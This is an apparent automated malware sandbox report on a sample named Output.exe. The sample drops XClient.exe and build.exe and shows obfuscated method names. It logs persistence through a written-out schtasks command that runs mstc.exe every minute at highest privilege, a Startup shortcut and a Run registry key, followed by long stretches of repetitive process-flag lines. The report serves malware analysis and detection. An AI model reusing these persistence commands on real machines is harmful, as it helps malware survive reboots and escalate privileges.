Source: 2.2.XClient.exe.12971a78.0.raw.unpack, 3dg67Hflw776.cs	High entropy of concatenated method names: 'hZxAuDj9Jj9u', '_3Qy4UFcEdlNY', '_2294zxCSCHCw', '_0qK9t4wKxrzL27CQ8s9ddLoNMLy2TP0lOtSOsLCBueT2g9tPonkeOrSwcuKiyJvm7GTnm4FIA388d', 'CIaB8V1yHt0van8khS3otNmkNzmGKUl4U1qjCzy35nCpW8MxhE8pOWLdCh4HLHFOqK6d8gKuQCJC6', '_605Mm7Dqz4qb22jKfbi5wxRyKOgt1MaraZ8DECKou8HEJb12l277PS3BtjSUYludx9AUvjG7UCjkd', 'BalXfAsSbbv1KLd0cEQooEQJITmeMwP4nucT8oU0VATvZs5nDbzovFWpmy7NzM4UGQnSj93kh4RaA', 'mFyFTS9D4DZRiDjhvIXzuvJ0JEvsIojyxmr2mYCUYkHUb10E6S9KtNTiy06m2sv8QSNUeB4tUEOaZ', 'ibarKDUxYGaLPTIAEoFN29e19WZ0VEN8aSJT9p9qm9vCrSHe8kQmB954VV8ZYfDBI0xOICbr5QGBY', '_9oTtgQOfb9P8R0YOkwG8eKSTScuxbBgmd0DcCIWJzbWhnTTAyOieQv5NalzfmT8vd1ikT2k3yIkJV'
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, PU04YBr95a4s.cs	High entropy of concatenated method names: 'yqhOBFNaWtVN', '_1vUEaYbG8utM', 'SOaCsktq01bM', 'kwpQl75N71Cv', 'a177LTtfjdj8', 'StJPkX04XKHZ', 'TA526AudvkKD', 'NuJTJwyyoaLO', 'wR5HxepDMrgV', '_8wzcod38H1It'
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, 610K9Nltakcz.cs	High entropy of concatenated method names: 'Pqfp1QEKvuwi', 'WUeIUtf5Gki4', 'wDqdy83OtonM', 's4hsqOzaMV34', 'buBWw3Wz3yd7', 'v6V29EEdAsms', 'ileE89Jp8nVH', 'PWBLTWfwgSjj', 'uE1L9czjStAO', 'frwZeOC1erIk'
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, YYMQyP6IfH27.cs	High entropy of concatenated method names: 'dhLBNP0ACLMV', '_7IQYe0avXNImebriw7fP4DmJGOWOhj4iRUkhV8jPOsghyVe7fNu8fSXyd0g8Uq96iUeb3i5U5avHZ', 'TehLmWRSfstygnOgmEw9gTfnj6z5nlzqAaIrqiFLxvUcXScEdct2muqVLfe0psA3GErXJYRhYsuyU', 'PAApgbYmqG4f2lZVZYHXzGhPlVttY8U9LmrBhzBoEW1xnk10JcREbnBd5Tr6onX360uwGY6cGqHRW', 'sVV7mwXq8vfxBJsMAmGxl7Ci0XQMt4pDuQFCiaFAOnVWSWpM2xaylCyQCZ2C6D2vooMlXUeSVMNb6'
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, vL9RsahRR1B6.cs	High entropy of concatenated method names: 'y25yBETh42sT', '_0qlBv9t0KJUy', 'NMP9ihl4T2o8OQsBH4biNba2ksOsQCZsTtD8Ds5JVBzdjnrffCjmboFApoicun', 'rbUrnXFYUitBXArghOGCXNN6ozoGQAcFHH6o2bivaKEqGn04DaqyKwsSfz6HHA', 'g0kAcJ7Uh7Ggeccj6LCjsJZMBx4VtBE5MsKkOUtcPlYCtPVmZS9bB2DkYfDzbj', 'ifTgjUrPmHAkKS7UVKE4KDoNM7OxjmeYhRY6UFlupsPXsvKaSpGhh9ubNmKkyq'
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, lSFCDeEWkDjK.cs	High entropy of concatenated method names: 'T0A8k16WPwcI', 'p2fnYcn3Vaftl4NHq4fTedgyDq773UHhqiHV5PvBeY1L2GtxLJvsPpbuqZm2sf', 'fRkq4uaz2B79ApXOkjOrbEiYNFhUJ2OqUzyIDWw1VttGbmVOxtcVtDtqPTmAys', '_05aZNtPHALiNwgIcZu1AWtaPO6wLjzbf8Jg3Rz3RlXPVQnY4Ofj5RT5hmyHz91', 'UYKylSm4GOVEAWCVf2TdUECKdEf5NCVLLcHlrRQIR58Q5vZooE2stVvboWsVT8'
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, HNtrMR4sP9Q0.cs	High entropy of concatenated method names: 'g4hq9XYocGMW', 'iSlj79l5MaqV', 'cxGPhkxPUBdK', '_8MLQMs9TKEd9', 'LyLvhvrUjQ05Q5w1NqZLfdzjEUx89GyNSqJKF6yqGyCzpiLCZkA0LDNOp09cfV', 'FOoHHptZM8UiM7izhx488tDStOUnZwU8mQF6Lc5xHegXWWQXgODu83KJamEUVn', 'Te6B0OL1zhJTqcHftQqytrb1I3zooAJw0UvZmDnkDzpnN3MvADkgsMka5MaHwG', 'WNOsxK98qxK55mu6VG7ceQluT73WOGflGhHzR5G2t9kw4diMV0mxFRlNA7Gw0j', 'kg2vUkLXpHbheQsJ5I9N6vO7GfYXiCJnZailyPQYEKTwYYF8wuKhPZusXyZvql', '_232HzJuThv49wpAFIIWIVqfp2HrViWOvayMK1Z2VQFj6ntJUMczEYAIGC78QqM'
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, XX3glvP8cBuW.cs	High entropy of concatenated method names: 'Es9yP77RX55E', 'sVqdKFaIEHNp', '_4Omi1KNTHCXk', 'IAJiU1fZK0s6', 'H2YmA8TQhVCo', 'RfygCfn62f4g', 'yE2QnH4QdcEG', 'X80kyEGRxLyZ', 'BVKJLQeN9xKH', 'SaF63n2Nrs7x'
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, im9wFYLfycZyeMaz6yif3VopE01.cs	High entropy of concatenated method names: 'I1QX0Dz5Ckuyi1hzB0yItN0j0vb', 'bFEUL1qcJU6qpkpMzyfR4yNp8C5', 'zHsBfnZ3fsXWsE0N069aCc61e94', 'DKR2ojeeYYgn9FrCQawjBqrTrTQ', 'jSoWCxMhpD4RCTCmlNjwj5YM30T', 'Ne1rshGuvXrjPyaBixOLKxwKT1B', 'znPtAOv9i1PYxra7hXbqzqspadR', 'ROI4hADy5aypzmh8yAsD141vCUS', 'MSkty4rXBUI4GpIxQX4k1YRBeID', 'izqAhnXsTG9Ao0Z6m96EpRvL24V'

Source: C:\ProgramData\XClient.exe	File created: C:\Users\user\AppData\Local\Temp\mstc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Output.exe	File created: C:\ProgramData\build.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Output.exe	File created: C:\ProgramData\XClient.exe	Jump to dropped file

Source: C:\Users\user\Desktop\Output.exe	File created: C:\ProgramData\build.exe			Jump to dropped file
Source: C:\Users\user\Desktop\Output.exe	File created: C:\ProgramData\XClient.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\ProgramData\XClient.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "mstc" /tr "C:\Users\user\AppData\Local\Temp\mstc.exe"

Source: C:\ProgramData\XClient.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mstc.lnk

Jump to behavior

Source: C:\ProgramData\XClient.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mstc.lnk

Jump to behavior

Source: C:\ProgramData\XClient.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mstc			Jump to behavior
Source: C:\ProgramData\XClient.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mstc			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\Output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
